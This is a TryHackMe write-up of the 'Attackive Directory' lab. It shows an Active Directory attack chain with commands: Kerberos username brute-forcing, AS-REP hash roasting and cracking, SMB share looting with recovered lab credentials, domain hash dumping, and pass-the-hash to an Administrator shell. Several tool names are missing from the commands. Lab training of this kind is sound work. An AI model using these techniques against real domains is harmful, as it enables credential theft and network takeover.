Attackive Directory (THM)

99% of Corporate networks run off of AD. Can you exploit a vulnerable Domain Controller?

TryHackMe Attackive Directory Write-Up

topics: Active Directory, cracking hashes, pass the hash, Windows Privilege Escalation, Post-exploitation

  1. Background

  2. Enumerate Domain Controller

  3. Exploiting Kerberos

  4. Administrator Privilege Escalation

new tools: kerbrute,,

tools: nmapAutomator, impacket, smbmap, base64, python, john


Enumerate Domain Controller

initial nmap scan ./ $ip Basic

Out of the 13 ports showing, 8 of them are known ports associated with Active Directory.

Lets add spookysec.local into hosts echo $ip spookysec.local >> /etc/hosts

.local is an invalid top-level domain commonly used for AD Domains

We can enumerate SMB with enum4linux $ip. We don't have access to shares but it does reveal other sensitive information

Exploiting Kerberos

We can brute force the domain controller for usernames with a tool called kerbrute. The room provides us a username and password list to use, running./kerbrute_linux_386 userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100

Impacket provides a tool called which searches the domain, lets attack the admin, svc-admin

locate GetNPU (/usr/share/doc/python3-impacket/examples/

python3 /usr/share/doc/python3-impacket/examples/ spookysec.local/svc-admin -no-pass

Cracking the full hash with john john kerbhash --wordlist=/root/passwordlist.txt

Administrator Privilege Escalation

Now we have login credentials for the SMB server, svc-admin:management2005. Lets inspect the contents of the user share with smbmap

smbmap -H spookysec.local -d spookysec.local -u svc-admin -p management2005

There is an interesting file backup_credentials.txt on the backup share that we have read access to. Lets retrieve the file.

Inspecting the contents reveal it is encrypted with base64, decrypting yields the password backup2517860.

We can now use another impacket tool, to view all the password hashes the user account can access.

python3 /usr/share/doc/python3-impacket/examples/ -just-dc backup@spookysec.local

We now have the Admin's password hash to crack but instead, we can use a technique called pass the hash to get a shell as Admin. We can use another impacket tool to use the Administrator's full hash and create a shell.

python3 /usr/share/doc/python3-impacket/examples/ Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b

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